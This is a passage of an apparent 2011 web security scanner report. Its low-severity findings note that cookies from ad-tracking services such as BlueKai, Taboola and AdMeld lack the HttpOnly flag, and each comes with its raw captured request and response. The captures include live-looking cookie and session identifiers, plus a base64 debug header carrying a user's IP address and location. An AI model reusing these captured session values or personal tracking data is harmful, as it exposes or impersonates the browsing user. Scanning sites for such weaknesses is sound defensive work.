User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICAzMTM4NzI1LCAgbmV0d29yazogICAgICAiYWRjb20iLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICIxLTQiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjZjNGUxYjNjLThhZDItNDlhNi1hZGE2LTU4ZTgwOTYwNDhkZSIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBkaXY6ICAgICAgICAgICI2YzRlMWIzYy04YWQyLTQ5YTYtYWRhNi01OGU4MDk2MDQ4ZGUiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgNSwgIG5ldHdvcmtfaWQ6ICAgMSwgIGFjY291bnRfaWQ6ICAgMTMsICBuZXR3b3JrX25hbWU6ICJBZHZlcnRpc2luZy5jb20iLCAgcHVibGlzaGVyX25hbWU6ICJmb3huZXdzIiwgIGVjcG06ICAgICAgICAgIjAuODYiLCAgZmVjcG06ICAgICAgICAiMC44NiIsICBmaWxsOiAgICAgICAgICI0NS41MCIsICBwbGFjZW1lbnQ6ICAgICJwb2xpdGljcy1ib3R0b20iLCAgcnVsZTogICAgICAgICAicG9saXRpY3MtYm90dG9tIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjMwNDksICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODEsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJ4KzEgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxMTc4MTUsICJidXkiOjkwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhNiBEZWdyZWVzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjE0MTA3OSwgImJ1eSI6MzMxMSwibHAiOiJodHRwOi8vd3d3LnZpcmdpbmFtZXJpY2EuY29tL3Z4L2Jvb2tpbmcvZXhpdC1oYXBwaWVyP2NpZD1kaXNfMDAwNzYiLCJhbiI6IiIsInN0YXR1cyI6IjEuMjMgTiIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJUdWJlbW9ndWwgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo1ODk1ODA4LCAiYnV5Ijo4NDcxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjg5NywgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93ZWxjb21lLmhwLmNvbS9jb3VudHJ5L3VzL2VuL2NzL2hvbWVfYy5odG1sIiwiYW4iOiJIUCBEaXJlY3QiLCJzdGF0dXMiOiIwLjEyIiwiZmlkIjo0ODkyLCAiZmNwbSI6IjEuNzUifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyOTc5LCAiYnV5IjoxOTksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9XSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgIiIsICBob3N0OiAgICAgICAgICJuai10YWcxMiJ9
Content-Length: 1629
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:19 GMT
Connection: close
Set-Cookie: D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA; expires=Mon, 09-May-2011 16:21:19 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
6.171. http://tags.bluekai.com/ids  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /ids

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ids?dest=132&id=a53875b5-a877-4a03-ad1a-e28c70299475 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/bkdp.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=kQ199mtFk6lIvnhA; bko=KJ0fyXF9TnCCriXMy0xtOGSTz2B2mHkDQVnFN6dljVm/aVHQK95A1EWDykZJxBAcb6WbJ9HCn9YTgCmQ; bkw5=KJhP6DXgOPWRhdcFlv78odywtP7xMEurvshzGlrbf69SHKcra1UmyLTfsOLFQfK9gspzMSnLfwhqG1Q818w7V1hpb7pmfdxXjT8sQsiBuYIega4O/RpmEX9qah7Q1Hq80uDk66LUs6gA4AJFeS58oG4EZLMjjJWh6A5fVrESAkbIn4aMrSt4oHZHj3l/UmZkAf+jA5W8u1vDLx3TPJVoZ4LXMbT4Kx6VRaBdbawFe7xxn8oX8gb6RBruQaGogNotn/k/uMslfPgiLNgvZXfLVKvhDGgo8+YuAsRooLwMmgusDgRyK6dNRMj2MvZAIYBZbZbXjj7bGSslQgdqs+nqCugAhGzvI6obrfEWTDOJ8kwjg2mt1kdd8Bqvd9n7+aGa; bkst=KJhMR5Mwhze9pkYSk8tUU8TU5tbbnyFexD0CYXCYMC+9xCI9xL/1h3RVCQSVoiqsaZjsOLSZjCjsC7dUQbE8rEa6Icve5HCqsoLjskZSZH+SZCQSs8ZRZvu9oPr96iG1JiZV8AAsjLSb0uZZogoo0zZVrZ7ZkAZbhi7JhL7shGjovSjJbVeNDXe3A2/1DLyLAoB6Qxjjbo3AZ3qGVixjsKiSZOZZVvxZV8QSJOrp8L6a3kXvPYdBTmpGsrp3bsGzZOq3ckbkShRjSopkTIaUbPiudhfLzekKOQRKC7JdPf4zyanwheEwTB5sLTei3dMxxQD9qVJDfQ==; bklc=4da32a72; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KbhVmyn9WqYO4X=; bk=7Snj3K+7kTPVmCfH; bkc=KJh56AWgOsWROdedmpFepsbIQC+JvcLxbIEiGWqz2gekRmBsmEM1QjPN//3uqEPv0D7jgztUysKxihH3O0Am0Fm1l+k8lL16XtFIdlgKopK6QJz9VOrXXaN1/0E4M6M4sufjcP2kQPRn3J/PWc+0H8gptCLrT9yGf1b4JtbrxFMS1wKNMlB9kbFQgJykcCba1mKN2XCH+XneEmCqYYhttpe7+U+fQsv4yZFIBmbpldGCpck+Nb1r744p+o8TSNtbRoMftizjIkTYcCLNlXBOf9defTSeQgHgIc+YmMnXjwCGEwgx11dnpovg+v27t+20Lhqwp8bkJtlmSdFAcNrC7cJIY1vzN286SwTiLJM0QiN5uMZiIfPwXdytmL8XxUQrJXN2fDFbPbefNW88lee7+El3l2EI2ba5loSK3AMpVdLwuNqYKx==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 11 Apr 2011 17:31:24 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=qkWMkm+7kTPVmCfH; expires=Sat, 08-Oct-2011 17:31:24 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56g2vyN9DOF9FdSBJ3bdQoACHyxbiaxxUO0siVTKYQ6DlOxKcek3heG3YQgxGaREiJBCYXxD03LXQniJGGPDH5O9XJIV6mUz/0R2XlIUz0dPixJXcBa/PNynQAV4itok/NIDxXJReBC1PNXSzfXzhfx4elO446cgNmkO/+B5MEI2gzNbXqxwHRxLcuNz5NpSQ4srRII/ptArwqusb4+7hbeiDmuXIJn5bnEpBk26xziat6pe7hxw2xcgxy7F0yrIps6Bx8gpR53CnIdtbwI2T56Lfq8MfTZvRFkKO8tgJ5UeLI2wyCIazu+LtdemklEnXRFC6xFFW11dnMoWn5abF5c8g+j/dwlrO7398nlqJFhWntRYE/NeZFcQ7uFm7QjV9k0wSZROq5nImSJbdS+4Cq0QFhgV8nfbZ40ZbEXt9JyNpUrhxdbfDwQ2h5A2fB3dBqdWdJAf1Zx==; expires=Sat, 08-Oct-2011 17:31:24 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkAnNvOeWDCPmLY/TdCSPQjULC0ztFluYMngMvLihi/60uiS9TtfQLVFL/QiORiRtBFGcG9TMFGS9F/Jiju+ptm2X8Usbcw1XH1AFs2DA2Z+ucq2K2e7ZjH3XJgjauG+cuuuiBNiOvik9sPAnaM5KDV0r6da0dudfflT7X3j7TEZijGeu1Vi7xvW8HvLwjpt1EntPEMPfVB+YiR+y3pShQ0/DxGR6FLIRZWShtPYcT/YPWf0NWqHNQXmQHVxpucqUIPKrfu/10lAWSLi93sz9TEAWGaApkMSxKjIgq8BX74TPL81VQ09FLhIcVdQVGQ0WKftpF7r57GbdtXBDaxrqJjvdRwmtwrtULeMfTEK/widIII9rigVeM; expires=Sat, 08-Oct-2011 17:31:24 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 12-Apr-2011 17:31:24 GMT; path=/; domain=.bluekai.com
BK-Server: 45b2
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
6.172. http://tags.bluekai.com/site/2174  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2174

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2174 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=kQ199mtFk6lIvnhA; bko=KJ0fyXF9TnCCriXMy0xtOGSTz2B2mHkDQVnFN6dljVm/aVHQK95A1EWDykZJxBAcb6WbJ9HCn9YTgCmQ; bkw5=KJhP6DXgOPWRhdcFlv78odywtP7xMEurvshzGlrbf69SHKcra1UmyLTfsOLFQfK9gspzMSnLfwhqG1Q818w7V1hpb7pmfdxXjT8sQsiBuYIega4O/RpmEX9qah7Q1Hq80uDk66LUs6gA4AJFeS58oG4EZLMjjJWh6A5fVrESAkbIn4aMrSt4oHZHj3l/UmZkAf+jA5W8u1vDLx3TPJVoZ4LXMbT4Kx6VRaBdbawFe7xxn8oX8gb6RBruQaGogNotn/k/uMslfPgiLNgvZXfLVKvhDGgo8+YuAsRooLwMmgusDgRyK6dNRMj2MvZAIYBZbZbXjj7bGSslQgdqs+nqCugAhGzvI6obrfEWTDOJ8kwjg2mt1kdd8Bqvd9n7+aGa; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101U8+B1LU9WQSOAX=; bk=D6aZAr+7kTPVmCfH; bkc=KJh56gav96WxOrOdATr8ud9PfWyPYN1WEVzqmna1WDiHGJtkHHGMhARDaW/mHDFgtwQuwGERi/PYpQHOYXsjApWfDh0fcdFd19ylvQBnGDBCdpjt9WqA+UDG+TmaEXko6KsoKHw761IhoXSzabXL9bNPCf4S55j7FNKQpckhsaclOJQdUFlfbWOfR1h2XECw2NlQKjnWWzTppTydMwLBf5eTSN1fBUThF3hgUhMpFmyuKDMfK3U2f567t4pLq4oXzNTzAfXeC8f7VCUv7Oz4aZMIa+eNl9Z6t8fEW7OsXdh1aL8dx7Z7g1N2XHt2BKCdZ7gK1mSXmvnIxdvlelcFVc+gG1t7IO4lnj2K; bkst=KJhMR5Mwhze9pkYSk8tUU8TU5tbbnyFexD0CYXCYMC+9xCI9xL/1h3RVCQSVoiqsaZjsOLSZjCjsC7dUQbE8rEa6Icve5HCqsoLjskZSZH+SZCQSs8ZRZvu9oPr96iG1JiZV8AAsjLSb0uZZogoo0zZVrZ7ZkAZbhi7JhL7shGjovSjJbVeNDXe3A2/1DLyLAoB6Qxjjbo3AZ3qGVixjsKiSZOZZVvxZV8QSJOrp8L6a3kXvPYdBTmpGsrp3bsGzZOq3ckbkShRjSopkTIaUbPiudhfLzekKOQRKC7JdPf4zyanwheEwTB5sLTei3dMxxQD9qVJDfQ==

Response

HTTP/1.0 200 OK
Date: Sat, 09 Apr 2011 12:31:05 GMT
Set-Cookie: bklc=4da05189; expires=Mon, 11-Apr-2011 12:31:05 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Sun, 10 Apr 2011 12:31:05 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=BIMCvr+7kTPVmCfH; expires=Thu, 06-Oct-2011 12:31:05 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56gav96WxOrOdApr2ud9PfOxnnDyCZL8VmBWrHzeYGJNtaikiHY6DOxUhDOHLqW6SUXvcWOrhD1ioYaG/poh1LMwaL4rhdydezv6/YYzzeojFWQKQHK8rxF7mrOT14aRsCivczmmbfbkovcBK4WMmCC6Kabbu9oGa5LIRXInHWS9t8FOSrzpffn5hvcBKc1UDlxzIc0fbl+7uqC+pUlhKowLSXBHJAhMcrEI1lTtqPKl/Ic+mmpBIBMb56ETh877jJ4/KfKra2g4KE4w8tRF6IKSXmYcdO9TBp8PJvcBKFOludePQN4BvGall7JV9/8g7+pByXxFvutP+fG+FbSNvdNwwXbyh8XDh2KdEdlt/sfFSXtN+wLPditSgR9==; expires=Thu, 06-Oct-2011 12:31:05 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sun, 10-Apr-2011 12:31:05 GMT; path=/; domain=.bluekai.com
BK-Server: 1ae0
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
6.173. http://tags.bluekai.com/site/2731  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2731

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=kQ199mtFk6lIvnhA; bko=KJ0fyXF9TnCCriXMy0xtOGSTz2B2mHkDQVnFN6dljVm/aVHQK95A1EWDykZJxBAcb6WbJ9HCn9YTgCmQ; bkw5=KJhP6DXgOPWRhdcFlv78odywtP7xMEurvshzGlrbf69SHKcra1UmyLTfsOLFQfK9gspzMSnLfwhqG1Q818w7V1hpb7pmfdxXjT8sQsiBuYIega4O/RpmEX9qah7Q1Hq80uDk66LUs6gA4AJFeS58oG4EZLMjjJWh6A5fVrESAkbIn4aMrSt4oHZHj3l/UmZkAf+jA5W8u1vDLx3TPJVoZ4LXMbT4Kx6VRaBdbawFe7xxn8oX8gb6RBruQaGogNotn/k/uMslfPgiLNgvZXfLVKvhDGgo8+YuAsRooLwMmgusDgRyK6dNRMj2MvZAIYBZbZbXjj7bGSslQgdqs+nqCugAhGzvI6obrfEWTDOJ8kwjg2mt1kdd8Bqvd9n7+aGa; bkst=KJhMR5Mwhze9pkYSk8tUU8TU5tbbnyFexD0CYXCYMC+9xCI9xL/1h3RVCQSVoiqsaZjsOLSZjCjsC7dUQbE8rEa6Icve5HCqsoLjskZSZH+SZCQSs8ZRZvu9oPr96iG1JiZV8AAsjLSb0uZZogoo0zZVrZ7ZkAZbhi7JhL7shGjovSjJbVeNDXe3A2/1DLyLAoB6Qxjjbo3AZ3qGVixjsKiSZOZZVvxZV8QSJOrp8L6a3kXvPYdBTmpGsrp3bsGzZOq3ckbkShRjSopkTIaUbPiudhfLzekKOQRKC7JdPf4zyanwheEwTB5sLTei3dMxxQD9qVJDfQ==; bklc=4da32a72; bk=UzrJrI+7kTPVmCfH; bkc=KJh56AWgOsWROdedmpFepsbIQC+JvcLxKlBP/t8ftcvyzS1zcmq9YQKivJkG+oHzfP8XYUysrDiC5oeiGepwbJN27dzyFKIF2dIFob5Jcm9k9+Ssn61a/Yc4M674VSb8UVdTQeKALe5dAqr2Yrag02pUwiAOwqbY+2n1wEGmRz8gf8wEUGVcZuH6We7LMZUmSd4l95DOC540K5j7FyNYZwwS4Ae5UKep2iplNgo6ypnl+DXn5aXYck+hsm9yXT4k5X+HH53lde6k7PoIL7yX/UNAZK5kaXAf+v27t+20mXfZjXduj8gptic8hNVGs0bwxJMptoLKpPXaaQ6FrB/NytAHmvO84k+5afTQwaKu8gftaqNPbcd3sJb6pc7+QwGlX4XI+mFq6+1BSEbNdyO6Oq4e; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101ufuVryn9WRyO5z=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 11 Apr 2011 16:21:24 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 12 Apr 2011 16:21:24 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=wcd/Jr+7kTPVmCfH; expires=Sat, 08-Oct-2011 16:21:24 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56AWgOsWROdedmpFepsbIQC+JvcLxbIu3H+ptLmPQT6R8m10OkUDQionJ+AgJSz+rqqTWwGBzoa9fucax7Z46pLfpc+fZdEUd4p62FR6L6sTeNKanUyaGAv5loD+tNlDnK9Z92jEFhbEFecB4K21a7YsaFRVnhv6NYaXq8gftuxfGzHVzN4wWGI1x8gptwM73PUiRg4LV9GF51zh8f4TIGeiQXJ3FhUltt0YWmSd+K+uk4UlK7iUKloYrsmSI2ZZsfLF9Rpw6wHpsdMeXqMQGunrsFbKA/XBwCGX7o/X1XfpLnnkvIl3ZdSt6y7CI2C05+eZFfjBdq/P00FAHYcBKKXrCIRF9DL3n+7xo8RMK8ycBX2FLmF1aT4ZzBwKNgIC4Q58EJIPJy8pU23CdWdfFxfrX/pNEAKSF2C2M0Laa; expires=Sat, 08-Oct-2011 16:21:24 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 12-Apr-2011 16:21:24 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
6.174. http://tags.bluekai.com/site/668  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/668

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/668 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=kQ199mtFk6lIvnhA; bko=KJ0fyXF9TnCCriXMy0xtOGSTz2B2mHkDQVnFN6dljVm/aVHQK95A1EWDykZJxBAcb6WbJ9HCn9YTgCmQ; bkw5=KJhP6DXgOPWRhdcFlv78odywtP7xMEurvshzGlrbf69SHKcra1UmyLTfsOLFQfK9gspzMSnLfwhqG1Q818w7V1hpb7pmfdxXjT8sQsiBuYIega4O/RpmEX9qah7Q1Hq80uDk66LUs6gA4AJFeS58oG4EZLMjjJWh6A5fVrESAkbIn4aMrSt4oHZHj3l/UmZkAf+jA5W8u1vDLx3TPJVoZ4LXMbT4Kx6VRaBdbawFe7xxn8oX8gb6RBruQaGogNotn/k/uMslfPgiLNgvZXfLVKvhDGgo8+YuAsRooLwMmgusDgRyK6dNRMj2MvZAIYBZbZbXjj7bGSslQgdqs+nqCugAhGzvI6obrfEWTDOJ8kwjg2mt1kdd8Bqvd9n7+aGa; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101U8+B1LU9WQSOAX=; bkst=KJhMR5Mwhze9pkYSk8tUU8TU5tbbnyFexD0CYXCYMC+9xCI9xL/1h3RVCQSVoiqsaZjsOLSZjCjsC7dUQbE8rEa6Icve5HCqsoLjskZSZH+SZCQSs8ZRZvu9oPr96iG1JiZV8AAsjLSb0uZZogoo0zZVrZ7ZkAZbhi7JhL7shGjovSjJbVeNDXe3A2/1DLyLAoB6Qxjjbo3AZ3qGVixjsKiSZOZZVvxZV8QSJOrp8L6a3kXvPYdBTmpGsrp3bsGzZOq3ckbkShRjSopkTIaUbPiudhfLzekKOQRKC7JdPf4zyanwheEwTB5sLTei3dMxxQD9qVJDfQ==; bk=BIMCvr+7kTPVmCfH; bkc=KJh56gav96WxOrOdApr2ud9PfOxnnDyCZL8VmBWrHzeYGJNtaikiHY6DOxUhDOHLqW6SUXvcWOrhD1ioYaG/poh1LMwaL4rhdydezv6/YYzzeojFWQKQHK8rxF7mrOT14aRsCivczmmbfbkovcBK4WMmCC6Kabbu9oGa5LIRXInHWS9t8FOSrzpffn5hvcBKc1UDlxzIc0fbl+7uqC+pUlhKowLSXBHJAhMcrEI1lTtqPKl/Ic+mmpBIBMb56ETh877jJ4/KfKra2g4KE4w8tRF6IKSXmYcdO9TBp8PJvcBKFOludePQN4BvGall7JV9/8g7+pByXxFvutP+fG+FbSNvdNwwXbyh8XDh2KdEdlt/sfFSXtN+wLPditSgR9==

Response

HTTP/1.0 200 OK
Date: Mon, 11 Apr 2011 16:21:06 GMT
Set-Cookie: bklc=4da32a72; expires=Wed, 13-Apr-2011 16:21:06 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 12 Apr 2011 16:21:06 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=UzrJrI+7kTPVmCfH; expires=Sat, 08-Oct-2011 16:21:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56AWgOsWROdedmpFepsbIQC+JvcLxKlBP/t8ftcvyzS1zcmq9YQKivJkG+oHzfP8XYUysrDiC5oeiGepwbJN27dzyFKIF2dIFob5Jcm9k9+Ssn61a/Yc4M674VSb8UVdTQeKALe5dAqr2Yrag02pUwiAOwqbY+2n1wEGmRz8gf8wEUGVcZuH6We7LMZUmSd4l95DOC540K5j7FyNYZwwS4Ae5UKep2iplNgo6ypnl+DXn5aXYck+hsm9yXT4k5X+HH53lde6k7PoIL7yX/UNAZK5kaXAf+v27t+20mXfZjXduj8gptic8hNVGs0bwxJMptoLKpPXaaQ6FrB/NytAHmvO84k+5afTQwaKu8gftaqNPbcd3sJb6pc7+QwGlX4XI+mFq6+1BSEbNdyO6Oq4e; expires=Sat, 08-Oct-2011 16:21:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101ufuVryn9WRyO5z=; expires=Sat, 08-Oct-2011 16:21:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 12-Apr-2011 16:21:06 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
6.175. http://trc.taboolasyndication.com/hearst-wptz/log/2/visible  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /hearst-wptz/log/2/visible

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hearst-wptz/log/2/visible?ri=6294fdafcc65acbb6883b4c8bcfde66e&sd=v1_236a2bab7a70fd0aa84fc322a8e31bbd_7b1b4123-c1df-41ea-8602-e3f729bc08e8_1302352246_1302352246&ui=7b1b4123-c1df-41ea-8602-e3f729bc08e8&pi=27483035&pt=text&li=rbox-t2v&il=4873735584806990345%2C3501622745956464883%2C3170890797665116434&id=2951&url=http%3A//cdn.taboolasyndication.com/pixel.gif HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_236a2bab7a70fd0aa84fc322a8e31bbd_7b1b4123-c1df-41ea-8602-e3f729bc08e8_1302352246_1302352246; taboola_wv=; taboola_user_id=7b1b4123-c1df-41ea-8602-e3f729bc08e8; JSESSIONID=.prod2-f1

Response

HTTP/1.1 302 Found
Date: Sat, 09 Apr 2011 12:30:47 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Cache-Control: no-cache
Pragma: no-cache
Location: http://cdn.taboolasyndication.com/pixel.gif
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
